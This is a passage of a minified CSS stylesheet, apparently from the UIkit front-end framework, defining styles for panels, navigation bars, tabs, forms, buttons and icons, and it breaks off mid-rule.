.uk-panel-title,.uk-panel-box-hover:hover{color:#444}.uk-panel-box>.uk-panel-teaser{margin-top:-16px;margin-left:-16px;margin-right:-16px}.uk-panel-box>.uk-nav-side{margin:0 -15px}.uk-article>:last-child,.uk-block>:last-child{margin-bottom:0}.uk-panel-box-primary{background-color:#ebf7fd;color:#2d7091;border-color:rgba(45,112,145,.3)}.uk-panel-box-primary .uk-panel-title,.uk-panel-box-primary-hover:hover{color:#2d7091}.uk-panel-box-secondary{background-color:#fff;color:#444}.uk-panel-box-secondary .uk-panel-title,.uk-panel-box-secondary-hover:hover{color:#444}.uk-panel-hover{padding:15px;color:#444;border:1px solid transparent;border-radius:4px}.uk-panel-hover:hover{background:#fafafa;color:#444;border-color:#ddd}.uk-panel-hover>.uk-panel-teaser{margin-top:-16px;margin-left:-16px;margin-right:-16px}.uk-panel-header .uk-panel-title{padding-bottom:10px;border-bottom:1px solid #ddd;color:#444}.uk-panel-space{padding:30px}.uk-panel-space .uk-panel-badge{top:30px;right:30px}.uk-panel+.uk-panel-divider{margin-top:50px!important}.uk-panel+.uk-panel-divider:before{content:"";display:block;position:absolute;top:-25px;left:0;right:0;border-top:1px solid #ddd}.uk-article:after,.uk-article:before,.uk-block:after,.uk-block:before,.uk-comment-header:after,.uk-comment-header:before{content:"";display:table}@media (min-width:1220px){.uk-width-xlarge-1-1{width:100%}.uk-width-xlarge-1-2,.uk-width-xlarge-2-4,.uk-width-xlarge-3-6,.uk-width-xlarge-5-10{width:50%}.uk-width-xlarge-1-3,.uk-width-xlarge-2-6{width:33.333%}.uk-width-xlarge-2-3,.uk-width-xlarge-4-6{width:66.666%}.uk-width-xlarge-1-4{width:25%}.uk-width-xlarge-3-4{width:75%}.uk-width-xlarge-1-5,.uk-width-xlarge-2-10{width:20%}.uk-width-xlarge-2-5,.uk-width-xlarge-4-10{width:40%}.uk-width-xlarge-3-5,.uk-width-xlarge-6-10{width:60%}.uk-width-xlarge-4-5,.uk-width-xlarge-8-10{width:80%}.uk-width-xlarge-1-6{width:16.666%}.uk-width-xlarge-5-6{width:83.333%}.uk-width-xlarge-1-10{width:10%}.uk-width-xlarge-3-10{width:30%}.uk-width-xlarge-7-10{width:70%}.uk-width-xlarge-9-10{width:90%}.uk-panel+.uk-panel-divider{margin-top:70px!important}.uk-panel+.uk-panel-divider:before{top:-35px}}.uk-cover-object,[data-uk-cover]{left:50%;top:50%;position:relative}.uk-panel-box .uk-panel-teaser{border-top-left-radius:4px;border-top-right-radius:4px;overflow:hidden;-webkit-transform:translateZ(0)}.uk-block{position:relative;box-sizing:border-box;padding-top:20px;padding-bottom:20px}@media (min-width:768px){.uk-block{padding-top:50px;padding-bottom:50px}}.uk-block-large{padding-top:20px;padding-bottom:20px}@media (min-width:768px){.uk-block-large{padding-top:50px;padding-bottom:50px}}@media (min-width:960px){.uk-block-large{padding-top:100px;padding-bottom:100px}}.uk-block-default{background:#fff}.uk-block-muted{background:#f9f9f9}.uk-block-primary{background:#00a8e6}.uk-block-secondary{background:#222}.uk-block-default+.uk-block-default,.uk-block-muted+.uk-block-muted,.uk-block-primary+.uk-block-primary,.uk-block-secondary+.uk-block-secondary{padding-top:0}.uk-article-title{font-size:36px;line-height:42px}.uk-article-title a{color:inherit}.uk-article-meta{font-size:12px;line-height:18px;color:#999}.uk-article-lead{color:#444;font-size:18px;line-height:24px;font-weight:400}.uk-article-divider{margin-bottom:25px;border-color:#ddd}*+.uk-article-divider{margin-top:25px}.uk-article+.uk-article{margin-top:25px;padding-top:25px;border-top:1px solid #ddd}.uk-comment-header{margin-bottom:15px;padding:10px;border:1px solid #ddd;border-radius:4px;background:#fafafa}.uk-comment-avatar{margin-right:15px;float:left}.uk-comment-title{margin:5px 0 0;font-size:16px;line-height:22px}.uk-comment-meta{margin:2px 0 0;font-size:11px;line-height:16px;color:#999}.uk-comment-body{padding-left:10px;padding-right:10px}.uk-comment-body>:last-child{margin-bottom:0}.uk-comment-list{padding:0}.uk-comment-list .uk-comment+ul{margin:25px 0 0}.uk-comment-list .uk-comment+ul>li:nth-child(n+2),.uk-comment-list>li:nth-child(n+2){margin-top:25px}@media (min-width:768px){.uk-comment-list .uk-comment+ul{padding-left:100px}}.uk-comment-primary .uk-comment-header{border-color:rgba(45,112,145,.3);background-color:#ebf7fd;color:#2d7091;text-shadow:0 1px 0 #fff}.uk-nav-dropdown .uk-nav-divider,.uk-nav-navbar .uk-nav-divider{border-top:1px solid #ddd}.uk-cover-background{background-position:50% 50%;background-size:cover;background-repeat:no-repeat}.uk-cover{overflow:hidden}.uk-cover-object{width:auto;height:auto;min-width:100%;min-height:100%;max-width:none;-webkit-transform:translate(-50%,-50%);transform:translate(-50%,-50%)}[data-uk-cover]{-webkit-transform:translate(-50%,-50%);transform:translate(-50%,-50%)}.uk-nav,.uk-nav ul{margin:0;padding:0}.uk-nav li>a{display:block}.uk-nav>li>a{padding:5px 15px}.uk-nav ul{padding-left:15px}.uk-nav ul a{padding:2px 0}.uk-nav li>a>div{font-size:12px;line-height:18px}.uk-nav-header{padding:5px 15px;text-transform:uppercase;font-weight:700;font-size:12px}.uk-nav-header:not(:first-child){margin-top:15px}.uk-nav-divider{margin:9px 15px}ul.uk-nav-sub{padding:5px 0 5px 15px}.uk-nav-parent-icon>.uk-parent>a:after{content:"\f104";width:20px;margin-right:-10px;float:right;font-family:FontAwesome;text-align:center}.uk-nav-parent-icon>.uk-parent.uk-open>a:after{content:"\f107"}.uk-nav-side>li>a{color:#444}.uk-nav-side>li>a:focus,.uk-nav-side>li>a:hover{background:rgba(0,0,0,.03);color:#444;outline:0;box-shadow:inset 0 0 1px rgba(0,0,0,.06);text-shadow:0 -1px 0 #fff}.uk-nav-side>li.uk-active>a{background:#00a8e6;color:#fff;box-shadow:inset 0 0 5px rgba(0,0,0,.05);text-shadow:0 -1px 0 rgba(0,0,0,.1)}.uk-nav-side .uk-nav-header{color:#444}.uk-nav-side .uk-nav-divider{border-top:1px solid #ddd;box-shadow:0 1px 0 #fff}.uk-nav-side ul a{color:#07D}.uk-nav-side ul a:hover{color:#059}.uk-nav-dropdown>li>a{color:#444}.uk-nav-dropdown>li>a:focus,.uk-nav-dropdown>li>a:hover{background:#00a8e6;color:#fff;outline:0;box-shadow:inset 0 0 5px rgba(0,0,0,.05);text-shadow:0 -1px 0 rgba(0,0,0,.1)}.uk-nav-dropdown .uk-nav-header{color:#999}.uk-nav-dropdown ul a{color:#07D}.uk-nav-dropdown ul a:hover{color:#059}.uk-nav-navbar>li>a{color:#444}.uk-nav-navbar>li>a:focus,.uk-nav-navbar>li>a:hover{background:#00a8e6;color:#fff;outline:0;box-shadow:inset 0 0 5px rgba(0,0,0,.05);text-shadow:0 -1px 0 rgba(0,0,0,.1)}.uk-nav-navbar .uk-nav-header{color:#999}.uk-nav-offcanvas .uk-nav-header,.uk-nav-offcanvas>li>a{border-top:1px solid rgba(0,0,0,.3);text-shadow:0 1px 0 rgba(0,0,0,.5)}.uk-nav-navbar ul a{color:#07D}.uk-nav-navbar ul a:hover{color:#059}.uk-nav-offcanvas>li>a{color:#ccc;padding:10px 15px;box-shadow:inset 0 1px 0 rgba(255,255,255,.05)}.uk-nav-offcanvas>.uk-open>a,html:not(.uk-touch) .uk-nav-offcanvas>li>a:focus,html:not(.uk-touch) .uk-nav-offcanvas>li>a:hover{background:#404040;color:#fff;outline:0}html .uk-nav.uk-nav-offcanvas>li.uk-active>a{background:#1a1a1a;color:#fff;box-shadow:inset 0 1px 3px rgba(0,0,0,.3)}.uk-nav-offcanvas .uk-nav-header{color:#777;margin-top:0;background:#404040;box-shadow:inset 0 1px 0 rgba(255,255,255,.05)}.uk-nav-offcanvas .uk-nav-divider{border-top:1px solid rgba(255,255,255,.01);margin:0;height:4px;background:rgba(0,0,0,.2);box-shadow:inset 0 1px 3px rgba(0,0,0,.3)}.uk-nav-offcanvas ul a{color:#ccc}html:not(.uk-touch) .uk-nav-offcanvas ul a:hover{color:#fff}.uk-nav-offcanvas{border-bottom:1px solid rgba(0,0,0,.3);box-shadow:0 1px 0 rgba(255,255,255,.05)}.uk-nav-offcanvas .uk-nav-sub{border-top:1px solid rgba(0,0,0,.3);box-shadow:inset 0 1px 0 rgba(255,255,255,.05)}.uk-navbar{background:#f5f5f5;color:#444;border:1px solid rgba(0,0,0,.06);border-radius:4px}.uk-navbar:after,.uk-navbar:before{content:"";display:table}.uk-navbar-nav{margin:0;padding:0;float:left}.uk-navbar-nav>li{float:left;position:relative}.uk-navbar-nav>li>a{display:block;box-sizing:border-box;height:41px;padding:0 15px;line-height:40px;color:#444;font-size:14px;font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;font-weight:400;margin-top:-1px;margin-left:-1px;border:1px solid transparent;border-bottom-width:0;text-shadow:0 1px 0 #fff}.uk-navbar-nav>li.uk-active>a,.uk-navbar-nav>li>a:active{color:#444;border-left-color:rgba(0,0,0,.1);border-right-color:rgba(0,0,0,.1)}.uk-navbar-nav>li>a[href='#']{cursor:text}.uk-navbar-nav>li.uk-open>a,.uk-navbar-nav>li:hover>a,.uk-navbar-nav>li>a:focus{background-color:#fafafa;color:#444;outline:0;position:relative;z-index:1;border-left-color:rgba(0,0,0,.1);border-right-color:rgba(0,0,0,.1);border-top-color:rgba(0,0,0,.1)}.uk-navbar-nav>li>a:active{background-color:#eee;border-top-color:rgba(0,0,0,.2)}.uk-navbar-nav>li.uk-active>a{background-color:#fafafa;border-top-color:rgba(0,0,0,.1)}.uk-navbar-nav .uk-navbar-nav-subtitle{line-height:28px}.uk-navbar-nav-subtitle>div{margin-top:-6px;font-size:10px;line-height:12px}.uk-navbar-brand,.uk-navbar-toggle{font-size:18px;text-decoration:none}.uk-navbar-brand,.uk-navbar-content,.uk-navbar-toggle{box-sizing:border-box;display:block;height:41px;padding:0 15px;float:left;margin-top:-1px;text-shadow:0 1px 0 #fff}.uk-navbar-brand:before,.uk-navbar-content:before,.uk-navbar-toggle:before{content:'';display:inline-block;height:100%;vertical-align:middle}.uk-navbar-content+.uk-navbar-content:not(.uk-navbar-center){padding-left:0}.uk-navbar-content>a:not([class]){color:#07D}.uk-navbar-content>a:not([class]):hover{color:#059}.uk-navbar-brand{color:#444}.uk-navbar-brand:focus,.uk-navbar-brand:hover{color:#444;text-decoration:none;outline:0}.uk-navbar-toggle{color:#444}.uk-navbar-toggle:focus,.uk-navbar-toggle:hover{color:#444;text-decoration:none;outline:0}.uk-navbar-toggle:after{content:"\f0c9";font-family:FontAwesome;vertical-align:middle}.uk-navbar-toggle-alt:after{content:"\f002"}.uk-navbar-center{float:none;text-align:center;max-width:50%;margin-left:auto;margin-right:auto}.uk-navbar-flip{float:right}.uk-navbar-nav:first-child>li:first-child>a{border-top-left-radius:4px;border-bottom-left-radius:4px}.uk-navbar-flip .uk-navbar-nav>li>a{margin-left:0;margin-right:-1px}.uk-navbar-flip .uk-navbar-nav:first-child>li:first-child>a{border-top-left-radius:0;border-bottom-left-radius:0}.uk-navbar-flip .uk-navbar-nav:last-child>li:last-child>a{border-top-right-radius:4px;border-bottom-right-radius:4px}.uk-navbar-attached{border-top-color:transparent;border-left-color:transparent;border-right-color:transparent;border-radius:0}.uk-navbar-attached .uk-navbar-nav>li>a{border-radius:0!important}.uk-subnav{display:-ms-flexbox;display:-webkit-flex;display:flex;-ms-flex-wrap:wrap;-webkit-flex-wrap:wrap;flex-wrap:wrap;margin-left:-10px;margin-top:-10px;padding:0}.uk-subnav>*{-ms-flex:none;-webkit-flex:none;flex:none;padding-left:10px;margin-top:10px;position:relative;float:left}.uk-subnav:after,.uk-subnav:before{content:"";display:block;overflow:hidden}.uk-breadcrumb>li,.uk-breadcrumb>li>a,.uk-breadcrumb>li>span,.uk-subnav-line>:before,.uk-subnav>*>*{display:inline-block}.uk-subnav>*>*{color:#444}.uk-subnav>*>:focus,.uk-subnav>*>:hover{color:#07D;text-decoration:none}.uk-subnav>.uk-active>*{color:#07D}.uk-subnav-line>:before{content:"";height:10px;vertical-align:middle}.uk-breadcrumb>li,.uk-pagination>li,.uk-table td{vertical-align:top}.uk-subnav-line>:nth-child(n+2):before{margin-right:10px;border-left:1px solid #ddd}.uk-subnav-pill>*>*{padding:3px 9px;border-radius:4px}.uk-subnav-pill>*>:focus,.uk-subnav-pill>*>:hover{background:#fafafa;color:#444;text-decoration:none;outline:0;box-shadow:0 0 0 1px rgba(0,0,0,.15)}.uk-subnav-pill>.uk-active>*{background:#00a8e6;color:#fff;box-shadow:inset 0 0 5px rgba(0,0,0,.05)}.uk-subnav>.uk-disabled>*{background:0 0;color:#999;text-decoration:none;cursor:text;box-shadow:none}.uk-breadcrumb{padding:0;list-style:none;font-size:0}.uk-breadcrumb>li{font-size:1rem}.uk-breadcrumb>li:nth-child(n+2):before{content:"/";display:inline-block;margin:0 8px}.uk-breadcrumb>li:not(.uk-active)>span{color:#999}.uk-pagination{padding:0;text-align:center;font-size:0}.uk-pagination:after,.uk-pagination:before{content:"";display:table}.uk-pagination:after{clear:both}.uk-pagination>li{display:inline-block;font-size:1rem}.uk-pagination>li:nth-child(n+2){margin-left:5px}.uk-pagination>li>a,.uk-pagination>li>span{display:inline-block;min-width:16px;padding:3px 5px;line-height:20px;text-decoration:none;box-sizing:content-box;text-align:center;border:1px solid rgba(0,0,0,.06);border-radius:4px}.uk-pagination>li>a{background:#f5f5f5;color:#444;text-shadow:0 1px 0 #fff}.uk-pagination>li>a:focus,.uk-pagination>li>a:hover{background-color:#fafafa;color:#444;outline:0;border-color:rgba(0,0,0,.16)}.uk-pagination>li>a:active{background-color:#eee;color:#444}.uk-pagination>.uk-active>span{background:#00a8e6;color:#fff;border-color:transparent;box-shadow:inset 0 0 5px rgba(0,0,0,.05);text-shadow:0 -1px 0 rgba(0,0,0,.1)}.uk-button,.uk-button:disabled,.uk-tab>li>a{text-shadow:0 1px 0 #fff}.uk-pagination>.uk-disabled>span{background-color:#fafafa;color:#999;border:1px solid rgba(0,0,0,.06);text-shadow:0 1px 0 #fff}.uk-pagination-previous{float:left}.uk-pagination-next{float:right}.uk-pagination-left{text-align:left}.uk-pagination-right{text-align:right}.uk-tab-center .uk-tab>li>a,.uk-tab-grid>li>a{text-align:center}.uk-tab{margin:0;padding:0;border-bottom:1px solid #ddd}.uk-tab:after,.uk-tab:before{content:"";display:table}.uk-tab>li{margin-bottom:-1px;float:left;position:relative}.uk-tab>li>a{display:block;padding:8px 12px;border:1px solid transparent;border-bottom-width:0;color:#07D;text-decoration:none;border-radius:4px 4px 0 0}.uk-tab>li:nth-child(n+2)>a{margin-left:5px}.uk-tab>li.uk-open>a,.uk-tab>li>a:focus,.uk-tab>li>a:hover{border-color:rgba(0,0,0,.06);background:#f5f5f5;color:#059;outline:0}.uk-tab>li.uk-open:not(.uk-active)>a,.uk-tab>li:not(.uk-active)>a:focus,.uk-tab>li:not(.uk-active)>a:hover{margin-bottom:1px;padding-bottom:7px}.uk-tab>li.uk-active>a{border-color:#ddd #ddd transparent;background:#fff;color:#444}.uk-tab>li.uk-disabled>a{color:#999;cursor:text}.uk-button:not(:disabled),.uk-form input[type=checkbox]:not(:disabled),.uk-form input[type=radio]:not(:disabled){cursor:pointer}.uk-tab>li.uk-disabled.uk-active>a,.uk-tab>li.uk-disabled>a:focus,.uk-tab>li.uk-disabled>a:hover{background:0 0;border-color:transparent}.uk-tab-flip>li{float:right}.uk-tab-flip>li:nth-child(n+2)>a{margin-left:0;margin-right:5px}.uk-tab>li.uk-tab-responsive>a{margin-left:0;margin-right:0}.uk-tab-responsive>a:before{content:"\f0c9\00a0";font-family:FontAwesome}.uk-tab-center{border-bottom:1px solid #ddd}.uk-tab-center-bottom{border-bottom:none;border-top:1px solid #ddd}.uk-tab-center:after,.uk-tab-center:before{content:"";display:table}.uk-tab-center .uk-tab{position:relative;right:50%;border:none;float:right}.uk-tab-center .uk-tab>li{position:relative;right:-50%}.uk-tab-bottom{border-top:1px solid #ddd;border-bottom:none}.uk-tab-bottom>li{margin-top:-1px;margin-bottom:0}.uk-tab-bottom>li>a{padding-top:8px;padding-bottom:8px;border-bottom-width:1px;border-top-width:0;border-radius:0 0 4px 4px}.uk-tab-bottom>li.uk-open:not(.uk-active)>a,.uk-tab-bottom>li:not(.uk-active)>a:focus,.uk-tab-bottom>li:not(.uk-active)>a:hover{margin-bottom:0;margin-top:1px;padding-bottom:8px;padding-top:7px}.uk-tab-bottom>li.uk-active>a{border-top-color:transparent;border-bottom-color:#ddd}.uk-tab-grid{margin-left:-5px;border-bottom:none;position:relative;z-index:0}.uk-tab-grid:before{display:block;position:absolute;left:5px;right:0;bottom:-1px;border-top:1px solid #ddd;z-index:-1}.uk-tab-grid>li:first-child>a{margin-left:5px}.uk-tab-grid.uk-tab-bottom{border-top:none}.uk-tab-grid.uk-tab-bottom:before{top:-1px;bottom:auto}@media (min-width:768px){.uk-tab-left,.uk-tab-right{border-bottom:none}.uk-tab-left>li,.uk-tab-right>li{margin-bottom:0;float:none}.uk-tab-left>li>a,.uk-tab-right>li>a{padding-top:8px;padding-bottom:8px}.uk-tab-left>li:nth-child(n+2)>a,.uk-tab-right>li:nth-child(n+2)>a{margin-left:0;margin-top:5px}.uk-tab-left>li.uk-active>a,.uk-tab-right>li.uk-active>a{border-color:#ddd}.uk-tab-left{border-right:1px solid #ddd}.uk-tab-left>li{margin-right:-1px}.uk-tab-left>li>a{border-bottom-width:1px;border-right-width:0;border-radius:4px 0 0 4px}.uk-tab-left>li:not(.uk-active)>a:focus,.uk-tab-left>li:not(.uk-active)>a:hover{margin-bottom:0;margin-right:1px;padding-bottom:8px;padding-right:11px}.uk-tab-left>li.uk-active>a{border-right-color:transparent}.uk-tab-right{border-left:1px solid #ddd}.uk-tab-right>li{margin-left:-1px}.uk-tab-right>li>a{border-bottom-width:1px;border-left-width:0;border-radius:0 4px 4px 0}.uk-tab-right>li:not(.uk-active)>a:focus,.uk-tab-right>li:not(.uk-active)>a:hover{margin-bottom:0;margin-left:1px;padding-bottom:8px;padding-left:11px}.uk-tab-right>li.uk-active>a{border-left-color:transparent}}.uk-thumbnav{display:-ms-flexbox;display:-webkit-flex;display:flex;-ms-flex-wrap:wrap;-webkit-flex-wrap:wrap;flex-wrap:wrap;margin-left:-10px;margin-top:-10px;padding:0}.uk-thumbnav>*{-ms-flex:none;-webkit-flex:none;flex:none;padding-left:10px;margin-top:10px;float:left}.uk-thumbnav:after,.uk-thumbnav:before{content:"";display:block;overflow:hidden}.uk-thumbnav>*>*{display:block;background:#fff}.uk-thumbnav>*>*>img{opacity:.7;-webkit-transition:opacity .15s linear;transition:opacity .15s linear}.uk-thumbnav>*>:focus>img,.uk-thumbnav>*>:hover>img,.uk-thumbnav>.uk-active>*>img{opacity:1}.uk-list{padding:0}.uk-list>li:after,.uk-list>li:before{content:"";display:table}.uk-list>li>:last-child{margin-bottom:0}.uk-list ul{margin:0;padding-left:20px}.uk-list-line>li:nth-child(n+2){margin-top:5px;padding-top:5px;border-top:1px solid #ddd}.uk-list-striped>li{padding:5px;border-bottom:1px solid #ddd}.uk-list-striped>li:nth-of-type(odd){background:#fafafa}.uk-list-space>li:nth-child(n+2){margin-top:10px}.uk-list-striped>li:first-child{border-top:1px solid #ddd}@media (min-width:768px){.uk-description-list-horizontal{overflow:hidden}.uk-description-list-horizontal>dt{width:160px;float:left;clear:both;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.uk-description-list-horizontal>dd{margin-left:180px}}.uk-description-list-line>dt{font-weight:400}.uk-description-list-line>dt:nth-child(n+2){margin-top:5px;padding-top:5px;border-top:1px solid #ddd}.uk-description-list-line>dd{color:#999}.uk-table{border-collapse:collapse;border-spacing:0;width:100%;margin-bottom:15px}*+.uk-table{margin-top:15px}.uk-table td,.uk-table th{padding:8px;border-bottom:1px solid #ddd}.uk-table th{text-align:left}.uk-table thead th{vertical-align:bottom}.uk-table caption,.uk-table tfoot{font-size:12px;font-style:italic}.uk-table caption{text-align:left;color:#999}.uk-table tbody tr.uk-active{background:#f0f0f0}.uk-table-middle,.uk-table-middle td{vertical-align:middle!important}.uk-table-striped tbody tr:nth-of-type(odd){background:#fafafa}.uk-table-condensed td{padding:4px 8px}.uk-table-hover tbody tr:hover{background:#f0f0f0}.uk-form input,.uk-form select,.uk-form textarea{box-sizing:border-box;margin:0;border-radius:0;font:inherit;color:inherit}.uk-form select{text-transform:none}.uk-form optgroup{font:inherit;font-weight:700}.uk-form input::-moz-focus-inner{border:0;padding:0}.uk-form input[type=checkbox],.uk-form input[type=radio]{padding:0}.uk-form input:not([type]),.uk-form input[type=text],.uk-form input[type=password],.uk-form input[type=email],.uk-form input[type=url],.uk-form input[type=search],.uk-form input[type=tel],.uk-form input[type=number],.uk-form input[type=datetime],.uk-form textarea{-webkit-appearance:none}.uk-form input[type=search]::-webkit-search-cancel-button,.uk-form input[type=search]::-webkit-search-decoration{-webkit-appearance:none}.uk-form input[type=number]::-webkit-inner-spin-button,.uk-form input[type=number]::-webkit-outer-spin-button{height:auto}.uk-form fieldset{border:none;margin:0;padding:0}.uk-form textarea{overflow:auto;vertical-align:top}.uk-button,.uk-close{-webkit-appearance:none;overflow:visible;text-transform:none;text-align:center}.uk-button,.uk-button-group,.uk-form input:not([type=radio]):not([type=checkbox]),.uk-form select{vertical-align:middle}.uk-form :invalid{box-shadow:none}.uk-form>:last-child{margin-bottom:0}.uk-form input:not([type]),.uk-form input[type=text],.uk-form input[type=password],.uk-form input[type=email],.uk-form input[type=url],.uk-form input[type=search],.uk-form input[type=tel],.uk-form input[type=number],.uk-form input[type=datetime],.uk-form input[type=datetime-local],.uk-form input[type=date],.uk-form input[type=month],.uk-form input[type=time],.uk-form input[type=week],.uk-form input[type=color],.uk-form select,.uk-form textarea{height:30px;max-width:100%;padding:4px 6px;border:1px solid #ddd;background:#fff;color:#444;-webkit-transition:all .2s linear;-webkit-transition-property:border,background,color,box-shadow,padding;transition:all .2s linear;transition-property:border,background,color,box-shadow,padding;border-radius:4px}.uk-form input:not([type]):focus,.uk-form input[type=text]:focus,.uk-form input[type=password]:focus,.uk-form input[type=email]:focus,.uk-form input[type=url]:focus,.uk-form input[type=search]:focus,.uk-form input[type=tel]:focus,.uk-form input[type=number]:focus,.uk-form input[type=datetime]:focus,.uk-form input[type=datetime-local]:focus,.uk-form input[type=date]:focus,.uk-form input[type=month]:focus,.uk-form input[type=time]:focus,.uk-form input[type=week]:focus,.uk-form input[type=color]:focus,.uk-form select:focus,.uk-form textarea:focus{border-color:#99baca;outline:0;background:#f5fbfe;color:#444}.uk-form input:not([type]):disabled,.uk-form input[type=text]:disabled,.uk-form input[type=password]:disabled,.uk-form input[type=email]:disabled,.uk-form input[type=url]:disabled,.uk-form input[type=search]:disabled,.uk-form input[type=tel]:disabled,.uk-form input[type=number]:disabled,.uk-form input[type=datetime]:disabled,.uk-form input[type=datetime-local]:disabled,.uk-form input[type=date]:disabled,.uk-form input[type=month]:disabled,.uk-form input[type=time]:disabled,.uk-form input[type=week]:disabled,.uk-form input[type=color]:disabled,.uk-form select:disabled,.uk-form textarea:disabled{border-color:#ddd;background-color:#fafafa;color:#999}.uk-form :-ms-input-placeholder{color:#999!important}.uk-form ::-moz-placeholder{opacity:1;color:#999}.uk-form ::-webkit-input-placeholder{color:#999}.uk-form :disabled:-ms-input-placeholder{color:#999!important}.uk-form :disabled::-moz-placeholder{color:#999}.uk-form :disabled::-webkit-input-placeholder{color:#999}.uk-form legend{width:100%;border:0;padding:0 0 15px;font-size:18px;line-height:30px}.uk-form legend:after{content:"";display:block;border-bottom:1px solid #ddd;width:100%}input:not([type]).uk-form-small,input[type].uk-form-small,select.uk-form-small,textarea.uk-form-small{height:25px;padding:3px;font-size:12px}input:not([type]).uk-form-large,input[type].uk-form-large,select.uk-form-large,textarea.uk-form-large{height:40px;padding:8px 6px;font-size:16px}.uk-form select[multiple],.uk-form select[size],.uk-form textarea{height:auto}.uk-form-danger{border-color:#dc8d99!important;background:#fff7f8!important;color:#d85030!important}.uk-form-success{border-color:#8ec73b!important;background:#fafff2!important;color:#659f13!important}.uk-form-blank{border-color:transparent!important;border-style:dashed!important;background:0 0!important}.uk-form-blank:focus{border-color:#ddd!important}input.uk-form-width-mini{width:40px}select.uk-form-width-mini{width:65px}.uk-form-width-small{width:130px}.uk-form-width-medium{width:200px}.uk-form-width-large{width:500px}.uk-form-row:after,.uk-form-row:before{content:"";display:table}.uk-form-row+.uk-form-row{margin-top:15px}.uk-form-help-inline{display:inline-block;margin:0 0 0 10px}.uk-form-help-block{margin:5px 0 0}.uk-form-controls>:first-child{margin-top:0}.uk-form-controls>:last-child{margin-bottom:0}.uk-form-controls-condensed{margin:5px 0}.uk-form-stacked .uk-form-label{display:block;margin-bottom:5px;font-weight:700}@media (max-width:959px){.uk-form-horizontal .uk-form-label{display:block;margin-bottom:5px;font-weight:700}}.uk-button,.uk-button-dropdown,.uk-button-group,.uk-button-group>*,.uk-close,.uk-form-icon,.uk-icon-button,.uk-icon-spin{display:inline-block}@media (min-width:960px){.uk-form-horizontal .uk-form-label{width:200px;margin-top:5px;float:left}.uk-form-horizontal .uk-form-controls{margin-left:215px}.uk-form-horizontal .uk-form-controls-text{padding-top:5px}}.uk-form-icon{position:relative;max-width:100%}.uk-form-icon>[class*=uk-icon-]{position:absolute;top:50%;width:30px;margin-top:-7px;font-size:14px;color:#999;text-align:center;pointer-events:none}.uk-button-group,.uk-button-group .uk-button.uk-active,.uk-button-group .uk-button:active,.uk-button-group .uk-button:hover,.uk-overlay{position:relative}.uk-form-icon:not(.uk-form-icon-flip)>input{padding-left:30px!important}.uk-form-icon-flip>[class*=uk-icon-]{right:0}.uk-form-icon-flip>input{padding-right:30px!important}.uk-button::-moz-focus-inner{border:0;padding:0}.uk-button{margin:0;border:none;font:inherit;color:#444;box-sizing:border-box;padding:0 12px;background:#f5f5f5;line-height:28px;min-height:30px;font-size:1rem;text-decoration:none;border:1px solid rgba(0,0,0,.06);border-radius:4px}.uk-button:focus,.uk-button:hover{background-color:#fafafa;color:#444;outline:0;text-decoration:none;border-color:rgba(0,0,0,.16)}.uk-button.uk-active,.uk-button:active{background-color:#eee;color:#444}.uk-button-primary{background-color:#00a8e6;color:#fff}.uk-button-primary:focus,.uk-button-primary:hover{background-color:#35b3ee;color:#fff}.uk-button-primary.uk-active,.uk-button-primary:active{background-color:#0091ca;color:#fff}.uk-button-success{background-color:#8cc14c;color:#fff}.uk-button-success:focus,.uk-button-success:hover{background-color:#8ec73b;color:#fff}.uk-button-success.uk-active,.uk-button-success:active{background-color:#72ae41;color:#fff}.uk-button-danger{background-color:#da314b;color:#fff}.uk-button-danger:focus,.uk-button-danger:hover{background-color:#e4354f;color:#fff}.uk-button-danger.uk-active,.uk-button-danger:active{background-color:#c91032;color:#fff}.uk-button:disabled{background-color:#fafafa;color:#999;border-color:rgba(0,0,0,.06);box-shadow:none}.uk-button-link,.uk-button-link.uk-active,.uk-button-link:active,.uk-button-link:disabled,.uk-button-link:focus,.uk-button-link:hover{border-color:transparent;background:0 0;box-shadow:none;text-shadow:none}.uk-button-link{color:#07D}.uk-button-link.uk-active,.uk-button-link:active,.uk-button-link:focus,.uk-button-link:hover{color:#059;text-decoration:underline}.uk-button-link:disabled,.uk-icon-hover{color:#999}.uk-button-link:focus{outline:dotted 1px}.uk-button-mini{min-height:20px;padding:0 6px;line-height:18px;font-size:11px}.uk-button-small{min-height:25px;padding:0 10px;line-height:23px;font-size:12px}.uk-button-large{min-height:40px;padding:0 15px;line-height:38px;font-size:16px;border-radius:5px}.uk-button-group{font-size:0;white-space:nowrap}.uk-button-group .uk-button{vertical-align:top}.uk-button-dropdown{vertical-align:middle;position:relative}.uk-button-danger,.uk-button-primary,.uk-button-success{box-shadow:inset 0 0 5px rgba(0,0,0,.05);text-shadow:0 -1px 0 rgba(0,0,0,.1)}.uk-button-danger:focus,.uk-button-danger:hover,.uk-button-primary:focus,.uk-button-primary:hover,.uk-button-success:focus,.uk-button-success:hover{border-color:rgba(0,0,0,.21)}.uk-button-group>.uk-button:not(:first-child):not(:last-child),.uk-button-group>div:not(:first-child):not(:last-child) .uk-button{border-left-color:rgba(0,0,0,.1);border-right-color:rgba(0,0,0,.1);border-radius:0}.uk-button-group>.uk-button:first-child,.uk-button-group>div:first-child .uk-button{border-right-color:rgba(0,0,0,.1);border-top-right-radius:0;border-bottom-right-radius:0}.uk-button-group>.uk-button:last-child,.uk-button-group>div:last-child .uk-button{border-left-color:rgba(0,0,0,.1);border-top-left-radius:0;border-bottom-left-radius:0}.uk-button-group>.uk-button:nth-child(n+2),.uk-button-group>div:nth-child(n+2) .uk-button{margin-left:-1px}[class*=uk-icon-]{font-family:FontAwesome;display:inline-block;font-weight:400;font-style:normal;line-height:1;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}[class*=uk-icon-],[class*=uk-icon-]:focus,[class*=uk-icon-]:hover{text-decoration:none}.uk-icon-small{font-size:150%;vertical-align:-10%}.uk-icon-medium{font-size:200%;vertical-align:-16%}.uk-icon-large{font-size:250%;vertical-align:-22%}.uk-badge,.uk-close,.uk-overlay,.uk-overlay-area-content{vertical-align:middle}.uk-icon-justify{width:1em;text-align:center}.uk-icon-spin{-webkit-animation:uk-rotate 2s infinite linear;animation:uk-rotate 2s infinite linear}.uk-icon-hover:hover{color:#444}.uk-icon-button{box-sizing:border-box;width:35px;height:35px;border-radius:100%;background:#f5f5f5;line-height:35px;color:#444;font-size:18px;text-align:center;border:1px solid #e7e7e7;text-shadow:0 1px 0 